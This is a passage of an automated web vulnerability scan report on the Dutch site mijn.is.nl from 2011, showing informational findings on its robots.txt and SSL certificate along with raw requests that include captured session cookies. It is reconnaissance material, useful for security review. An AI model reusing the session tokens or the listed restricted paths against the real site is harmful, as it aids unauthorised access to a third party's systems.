Referer: https://mijn.is.nl/UI/Pages/Login.aspx?enc=HAd1rtUZbsmBBo0sEDuy4Y77RQ8pulvjDGc7K7rFx3kTzzzrtWb_5COLDfgvia9ibHuESaVAr1fhgE-qSHe9CeHuyYQgQiisvhW0ylw1FHPWM8gblSyg8L_p4jnpbynfk7yboZOCg5NDxQFzZfePQw**
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Session_mEKZzVbBy3fT4M=0BFC2EFF130C; .ASPXANONYMOUS=AMAPNIi5zAEkAAAAMDNkYjQ0NjktNmQ1OC00MDlmLWI1NTUtMmZkOTkwZGIwOTA0FUlBGlu8e1WigtSjBAI0k961u0I1; ASP.NET_SessionId=xi4rio45431fprnrtwyh3345; __utma=212596108.2052189299.1317774799.1317774799.1317774799.1; __utmb=212596108.8.10.1317774799; __utmc=212596108; __utmz=212596108.1317774799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Persistent_id_mEKZzVbBy3fT4M=0BFC2EFF130C:1317774813

ctl00_ajaxScriptManager_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjYyMjgxNjc5D2QWAmYPDxYCHghDdXN0b21lcjK%2FEwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABMSVMuSXNpcy5TaG9wLldlYi5CY
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:34:19 GMT
Content-Length: 46152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<br />LET OP: het kan echter zijn dat u IS Enterpise klant bent. Hierover hebben wij u op 1 februari een e-mail gestuurd. Om als IS Enterprise klant toegang te krijgen tot uw servicemenu gaat u naar <a href='https://service.isenterprise.com' target='_self'>service.isenterprise.com</a>
...[SNIP]...

6. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: mijn.is.nl

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 10:00:11 GMT
Accept-Ranges: bytes
ETag: "ce2cc99653f0cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 00:33:16 GMT
Connection: close
Content-Length: 245

...User-agent: *
Disallow: /App_Data
Disallow: /App_GlobalResources
Disallow: /App_Themes
Disallow: /bin
Disallow: /obj
Disallow: /Properties
Disallow: /UI/Images
Disallow: /UI/Javascript
Dis
...[SNIP]...

7. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mijn.is.nl
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.is.nl
Issued by:  Thawte SSL CA
Valid from:  Sun Oct 10 19:00:00 CDT 2010
Valid to:  Sat Dec 10 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Wed Oct 05 09:16:15 CDT 2011.